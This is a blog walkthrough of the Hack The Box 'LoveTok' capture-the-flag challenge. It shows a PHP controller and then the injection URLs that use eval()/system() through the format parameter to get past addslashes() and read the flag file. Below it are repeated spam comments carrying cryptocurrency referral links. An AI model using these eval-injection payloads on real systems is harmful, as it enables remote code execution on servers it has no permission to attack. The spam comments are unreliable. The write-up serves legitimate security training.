Description:
True love is tough and even harder to find. Once the sun has set, the lights close and the bell has rung… you find yourself licking your wounds and contemplating human existence. You wish to have somebody important in your life to share the experiences that come with it, the good and the bad. This is why we made LoveTok, the brand new service that accurately predicts in the threshold of milliseconds when love will come knockin’ (at your door). Come and check it out, but don’t try to cheat love because love cheats back. 💛
Go to hack the box and click on start Instance
It gives the Host address
It gives the Host address
Paste the host address on the browser. it is showing like this please check the below image
If we clicked on the “Nah, that doesn’t work for me. Try again!” button, a new time will be shown. However, we will notice the URL has changed where “?format=r” has been appended
http://134.122.106.163:30222/?format=r <?php
class TimeController
{
public function index($router)
{
$format = isset($_GET['format']) ? $_GET['format'] : 'r';
$time = new TimeModel($format);
return $router->view('index', ['time' => $time->getTime()]);
}
}http://134.122.106.163:30222/?format=${eval($_GET[1])}&1=system(ls);As the 1 variable is actually self-defined and goes through eval, its result is parsed and referenced through the PHP eval function on the challenge source code and does not actually go through the addslashes() function, at least not in a direct way. So we could use quotes in our self-referenced variable and the following way:
http://134.122.106.163:30222/?format=${eval($_GET[1])}&1=system('ls%20../');
ls command on / directory
http://134.122.106.163:30222/?format=${print(`cat /flag*`)}
or
http://134.122.106.163:30222/?format=${system($_GET[1])}&1=cat+/flagIVmuXFLAG : HTB{wh3n_l0v3_Redacted_p0pp1ng}Conclusion:
There are various ways to bypass an addslashes() restriction filter when user input is provided to the eval() php function . There might even a broader attack surface as the addslashes restriction payload bypass described above might be applicable to other kind of attacks in some specific cases, such as an SQL Injection, Command Injection attack.
Thanks For Reading
Happy Hacking !!!
I don’t think the title of your article matches the content lol. Just kidding, mainly because I had some doubts after reading the article. https://www.binance.com/register?ref=QCGZMHR6
Your article helped me a lot, is there any more related content? Thanks!
I don’t think the title of your article matches the content lol. Just kidding, mainly because I had some doubts after reading the article. https://accounts.binance.com/register/person?ref=JW3W4Y3A
Can you be more specific about the content of your article? After reading it, I still have some doubts. Hope you can help me.
Thanks for sharing. I read many of your blog posts, cool, your blog is very good.
Your article helped me a lot, is there any more related content? Thanks!
Your article helped me a lot, is there any more related content? Thanks! https://www.binance.com/register?ref=JW3W4Y3A
Your article helped me a lot, is there any more related content? Thanks!
Your point of view caught my eye and was very interesting. Thanks. I have a question for you. https://www.binance.com/en-IN/register?ref=A80YTPZ1
References:
Casino Dealer Schulung Superbet Willkommensbonus
Thanks for sharing. I read many of your blog posts, cool, your blog is very good.
I don’t think the title of your article matches the content lol. Just kidding, mainly because I had some doubts after reading the article.
Your point of view caught my eye and was very interesting. Thanks. I have a question for you. https://accounts.binance.com/bg/register-person?ref=V2H9AFPY
Your article helped me a lot, is there any more related content? Thanks!